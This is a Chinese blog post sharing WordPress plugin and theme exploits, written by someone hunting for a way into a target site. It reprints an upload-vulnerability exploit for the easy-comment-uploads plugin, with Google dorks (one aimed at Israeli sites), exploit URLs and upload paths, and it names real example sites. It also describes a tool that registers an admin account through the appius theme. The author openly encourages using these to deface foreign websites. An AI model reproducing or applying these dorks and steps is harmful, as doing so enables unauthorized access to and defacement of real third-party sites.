wordpress上传漏洞分享

今天在被黑站点统计审核的时候发现有个2B提交了一批wordpressjoomla程序的站,我联系了黑页提交者

我问他有wordpress漏洞0day啊,他说有,我说分享来玩玩,他没回复我,我手里有个目标站是wordpress,

惆怅啊,难道要钱才给?过了几个小时,我再联系他的时候,他的签名既然改成了wp利用  代价   16点结束。赶紧啦。。

人家是大牛,不愿分享,伤不起啊,只能自己动手找找看了,苦逼了长时间不研究这块(PS:小弟目前文职人员,偶尔混混技术部)

009

 

郁闷的同时,我去1337day看了看,一个是注入漏洞,免费的,

http://1337day.com/exploit/22846

测试了目标站,没用,一个是管理员绕过漏洞,但是要25美刀

http://1337day.com/exploit/description/22677

朋友叫我去一个国外论坛看看,我就看到了一个上传的,目标站既然也是上传,虽然只 能传txt,JPG之内的

但至少,离目标更近了,这个只能传txt,大家可以拿来日国外站,挂黑页装B玩,哈哈,下面分享代码

############################################################################

# Title : WordPress : easy-comment-uploads Upload Vulnerability

# Author : VIRUSLEGEND

# Vendor : http://www.wordpress.org

# Google Dork : inurl:/wp-content/plugins/easy-comment-uploads/

inurl:/wp-content/plugins/easy-comment-uploads/ site:il

# Tested on : Windows 7 , windows 8, linux

############################################################################

=== > Exploit :

http://TARGET/wp-content/plugins/easy-comment-uploads/upload-form.php

this link to see the allowed files to upload :

http://TARGET/wp-content/plugins/easy-comment-uploads/upload.php

upload a file .txt or any allowed file then you can access your file from here >>>

Uploaded File Access ==== > http://TARGET/wp-content/uploads/2014/10/uploadedfile.txt/

Examples :

1 - http://www.1937cn.net/wp-content/upl...legend.txt

2- http://www.1937cn.net/wp-content/uploa...legend.jpg

#################################################################

上传成功后找不到我们的txt?抓包?哦 no ,太麻烦了,直接这样找吧

地址在:wp-content/uploads/2014/11/

意思就是wp-content/uploads/2014/月/你的txt名字比如

https://www.fairyhouses.com/wp-content/uploads/2014/11/1937cn.txt

*******************************************************************

另外还有个老点的漏洞利用工具,也分享下,大家就不用去别的地方下载了

google dork:inurl:/wp-content/themes/appius

信息填好点confirm->exploit 出现success在点register。

注册的账户具有admin权限。

008

下载地址--->>这里


本博客所有文章如无特别注明均为原创。作者:封笔尘缘复制或转载请以超链接形式注明转自 封笔尘缘
原文地址《wordpress上传漏洞分享
分享到:更多

相关推荐

网友评论(0)